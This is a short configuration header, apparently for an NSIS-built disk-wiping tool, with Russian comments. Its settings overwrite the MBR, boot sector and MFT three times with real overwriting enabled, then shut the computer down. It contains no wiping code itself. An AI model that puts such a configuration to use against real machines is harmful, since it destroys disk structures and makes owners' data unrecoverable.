
; Включение/Выключение режима отладки 1/0
;
; 1 - Включить
; 0 - Выключить

!define DEBUG_MODE 0

; Количество перезаписей секторов MBR, BOOT'а и MFT

!define OVERWRITE_COUNT 3

; Действие по окончании работы 0, 1 или 2
;
; 0 - Ничего не делать
; 1 - Перезагрузка компьютера
; 2 - Выключение компьютера

!define SHUTDOWN_MODE 2

; Включение/Выключение реальной перезаписи секторов(Выключение используется при отладке)
;
; 1 - Включить
; 0 - Выключить

!define REAL_OVERWRITE_MODE 1
